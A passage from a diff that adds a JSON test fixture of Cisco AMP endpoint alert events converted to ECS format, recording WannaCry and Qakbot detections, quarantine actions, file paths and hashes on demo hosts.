+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419264043361501262",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:47.000Z",
+            "file": {
+                "name": "@WanaDecryptor@.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe",
+                "hash": {
+                    "sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10",
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25",
+                    "md5": "7bf2b57f2a205768755c07f238fb32cc"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25",
+                    "7bf2b57f2a205768755c07f238fb32cc",
+                    "45356a9dd616ed7161a3b9192e2f318d0ab5ad10"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500160068Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419264043361501000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Ransom:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419264043361501261",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:47.000Z",
+            "file": {
+                "name": "u.wnry",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry",
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500162155Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419264043361501000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Ransom:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229331435814969",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:47.000Z",
+            "file": {
+                "name": "u.wnry",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry",
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500164235Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419264043361501000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Ransom:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419204905956802579",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:46.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500166300Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6419264039066534000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Cannot delete",
+                        "error_code": 3221225761
+                    },
+                    "detection_id": "6419229322845880359",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:46.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500168364Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine",
+                "id": "6419264039066534000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419264039066533964",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648155
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:46.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "54a116ff80df6e6031059fc3036464df"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "54a116ff80df6e6031059fc3036464df",
+                    "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500170457Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419264039066534000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419264039066533964",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:46.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "54a116ff80df6e6031059fc3036464df"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "54a116ff80df6e6031059fc3036464df",
+                    "61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500172540Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419264039066534000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229322845880359",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:35:01.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500174721Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6412622782676337000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6412622782676336648",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:35:01.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500176777Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 